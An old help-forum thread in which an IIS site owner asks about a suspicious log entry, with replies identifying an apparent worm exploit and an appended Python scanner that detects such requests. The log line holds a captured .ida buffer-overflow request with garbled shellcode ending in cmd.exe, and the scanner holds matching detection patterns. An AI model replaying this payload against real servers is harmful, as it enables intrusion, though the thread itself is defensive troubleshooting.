Log File Records

Posted on 2005-05-03
Last Modified: 2013-12-04
I have a website (on Win2k & IIS 5.0) that insidently goes down every Sunday night. All this time I suspected ASP.NET being the problem with aspnet_wp.exe not restarting, but I found an interesting correlation between down time and my log files.

Below is one row of an HTTP request sent last Saturday right before my server went down. I see this post being made about 10 times before my server went down. Can anyone tell me a bit about this?

My first assumption was that ASP.NET is crashing IIS and therefore the log files are getting erroneous input, but looking at the IP below, I suspect wrongdoings. This is not my IP, not my host IP, and looks to me like someone is trying to exceed the request buffer and access memory space.

Can anyone tell me what this code would do? How can I secure my server from being affected by this type of attack?

------------------------------------------------- - - [30/Apr/2005:08:59:51 -0800] "GET /NULL.IDA?CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC%u0aeb%ub890%u898b%u77e8%u0000%u0000%u838b%u0094%u0000%u408b%u0564%u0150%u0000%ue0ff%u9090=x&ë+_됐èõÿÿÿoð}-‹÷f¸H3Éf‹È´™ü¬2Īâú$쟙™eªP(¹)½k7_Þf™q”™™q™™q×›™™Úœ™™qÈ›™™q½š™™Þœ™™q'˜™™Öœ™™Þœ™™qæ›™™Òœ™™qÇ™™™q™™™a™íyÒœ™™Éf+”Ÿ™™Þœ™™Éf+”Ÿ™™¶œ™™Éf+œ™™¢œ™™Éf+œ™™!™™™™ÉÖœ™™Éf+\œ™™!™™™™Éf+Oœ™™ZÒœ™™ó™ó€š˜™™ÉÒœ™™Éf+šŸ™™Z”“Îð÷÷íØìíöØííøúò¹Ï«©”“”“ñ+™™™f+&œ™™¶œ™™q_™™™af–/™™™a™íÎ++++󙦜™™Éñ™™™Úœ™™É¶œ™™Éf+/œ™™a™–™™™ó™¦œ™™ÉÚœ™™ÉÒœ™™Éf+šŸ™™afíý++++ró™ñ™™™Úœ™™ÉÒœ™™Éf+‘Ÿ™™a™í§++++afí¬++++ªBʦœ™™ÊÉÚœ™™É¢œ™™Éf+5œ™™a™í++++p²fffªYÑZªYZªBʽ›™™ÊªBÊÊÊÉf++œ™™a™í’++++½›™™Z!ffffZ™™™™Úœ™™^™Ý™™™Éf+þœ™™Úœ™™ªœ™™ÚÙÚ¥®œ™™Ú¡!˜˜™™ÚµÊʪYÉÉÉÙÉÑÉÉ쟙™ÉªYÉf+™ªœ™™Éf+œ™™®œ™™Éf+œ™™Úœ™™™Zñ™™™óÙf+9œ™™ZªYÉw›™™^™•™™™Éªœ™™É¶œ™™Éf+Åœ™™ªYÉw›™™É¢œ™™É®œ™™Éf+Åœ™™Z™™™™™™™™˜™™™É¸š™™^š‰™™™Ê۝™™ÊÉf+eœ™™Aa™ÁåEZZ‰™™™óŠöš™™Éf+½Ÿ™™öš™™Éf+©Ÿ™™a™í»++++é•ge4a™íŠ++++™¥“íi¥Yíu¥5íqZn4™Z™™™™™™™™™™™™™™™™™™™™Úœ™™Éó›f+€Ÿ™™ó™ó˜ó›f+pœ™™af–™™™Þœ™™¦œ™™^š˜™™™óÊóñff™™Éf+§Ÿ™™a™ìé++++ÿöŸ™™ÿݝ™™蟙™ߝ™™afì–++++q³fffߝ™™Þœ™™ó‰۝™™ÊÉf+iœ™™a™ìº++++óœÞœ™™Éf+lœ™™a™ì’++++Þœ™™ZªYZ›™™ú™™™™™™™™™™™™!™™hî¡ÔÃ+™íž++++ÑrhA꥚jïášj繚b׍ªKÏÎȦšb,ÁŸ™™ªP(žjÿ>í•++++ÀÆ^Û{FÀÆÇSß½šZHxšXªPÿ‘ß…šZXx›šX™šZòŸ™™ZÒŸ™™qÉ™™™þŸ™™Z$Êœ™™^Îq¶™™™ÆÉ«YªPnHek7Á¦™íŽ++++ÉÎFq„™™™ÆžÁÞÞÞÞr@Þ¦™ìSZÊþŸ™™ÉfŠÂZÎ$òŸ™™ÊÉfŽÆZ™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™™ÒÜË×ÜÕª«™ÚëüøíüÉðéü™ÞüíÊíøëíìéÐ÷ÿöØ™ÚëüøíüÉëöúüêêØ™ÚõöêüÑø÷ýõü™Éüüò×øôüýÉðéü™ÞõöûøõØõõöú™Îëðíüßðõü™Ëüøýßðõü™Êõüüé™Íüëôð÷øíüÉëöúüêê™ÜáðíÍñëüøý™™Îʫƪ«™êöúòüí™ûð÷ý™õðêíü÷™øúúüéí™êü÷ý™ëüúï™úõöêüêöúòüí™ÎÊØÊíøëíìé™þüíñöêí÷øôü™þüíñöêíûà÷øôü™êüíêöúòöéí™™™ÕöøýÕðûëøëàØ™ÞüíÉëöúØýýëüêê™êëî¨éî™úA®?„cmd.exe$ HTTP/1.1" 404 4203

Thank you all in advance!

- Eyal.
Question by:poogy21

    Accepted Solution

    I think this may be a worm attempting to take advantage of this IIS vulnerability:

    Expert Comment

    Is your machine patched with the latest updates for Windows and IIS?

    Author Comment


    All patches have been installed. And I'm not entirely sure that this is actually causing any problem.
    I guess it could be a worm. But why would I get hit by a worm directly from Italy? You would imagine that I would get hit by networks closer to my IP block.
    But it definitely is a reason for concern.

    I have a different problem with ASPNET user permissions and restarting the worker process. But I believe this worm / hacker is triggering a worker process restart.
    And since my aspnet_wp.exe is running into permissions problems, my server times out. :(   when it pures..

    Any ideas on how to go about filtering or blocking this type of mischief?

    Expert Comment

    First, update all the patches and any latest updates...then use IISLockdown to lock down the IIS webserver...Then you can use MBSA to further study the situation..
    From the request it seems the requestor is requesting some junk...Certainly it's not a valid request it seems....
    Worms can originate from any place on the planet...That's the good and bad of the internet..when you connect to the internet the whole planet is on a single network...
    For your ASP.NET question I may not be in a position to solve the issue but you can modify or change it according to your needs with some help from your programmers...
    or our EE gurus can definitely help you...

    Expert Comment

    Yes, highly recommend that you download and run MBSA to see if any patches were missed.
    You can get it from:

    Expert Comment

    If all patches are up to date then this should not be an issue but by the look of your log file someone (or a worm) appears to be trying to open a remote command prompt (with the CMD.exe at the end of the data).

    You could try and push the same code to a test server (if you have one available) to test if your theory on the process restart is correct.

    Hope this helps.
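As an added illustration (not part of the thread above, and not code from any of the participants), here is a small log scanner that flags requests shaped like the one in the question: a .ida/.idq target, a long run of one padding byte, %uXXXX-encoded bytes in the query, and cmd.exe at the tail. The sample log lines are constructed; the addresses and the payload are made up and only their shape matches the post.

```python
import re
from collections import Counter
from typing import Any, Dict, List

# Constructed sample lines in the same NCSA-style layout as the one in the question.
SAMPLE_LOG = "\n".join([
    '192.0.2.10 - - [30/Apr/2005:08:59:51 -0800] "GET /index.aspx HTTP/1.1" 200 1234',
    '192.0.2.11 - - [30/Apr/2005:08:59:51 -0800] "GET /NULL.IDA?' + "C" * 80
    + '%u0aeb%ub890%u898b=x&cmd.exe HTTP/1.1" 404 4203',
    '192.0.2.11 - - [30/Apr/2005:08:59:53 -0800] "GET /NULL.IDA?' + "C" * 80
    + '%u0aeb%ub890%u898b=x&cmd.exe HTTP/1.1" 404 4203',
    '192.0.2.12 - - [30/Apr/2005:09:00:02 -0800] "GET /images/logo.gif HTTP/1.1" 200 8872',
])

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
PADDING_RUN = 64  # a query repeating one byte this many times is not a normal request

def classify(url: str) -> List[str]:
    """Return the indicators that make a request URL look like an ISAPI .ida/.idq probe."""
    path, _, query = url.partition("?")
    reasons = []
    if path.lower().endswith((".ida", ".idq")):
        reasons.append("index-server-isapi-target")
    if re.search(r"(.)\1{%d,}" % (PADDING_RUN - 1), query):
        reasons.append("long-padding-run")
    if re.search(r"%u[0-9a-fA-F]{4}", query):
        reasons.append("unicode-%u-encoded-bytes")
    if "cmd.exe" in query.lower():
        reasons.append("cmd.exe-in-query")
    return reasons

def scan(log_text: str) -> List[Dict[str, Any]]:
    """Parse each line and keep the ones that match at least two indicators."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected layout
        reasons = classify(m.group("url"))
        if len(reasons) >= 2:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": m.group("status"), "reasons": reasons})
    return hits

def repeat_offenders(hits: List[Dict[str, Any]], threshold: int = 2) -> Dict[str, int]:
    """Source addresses seen at least `threshold` times, the pattern the asker noticed."""
    counts = Counter(h["ip"] for h in hits)
    return {ip: n for ip, n in counts.items() if n >= threshold}
```

Requiring two indicators keeps a lone 404 for a stray .ida URL from paging anyone, while the repeat count gives the list of sources worth blocking at the firewall.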
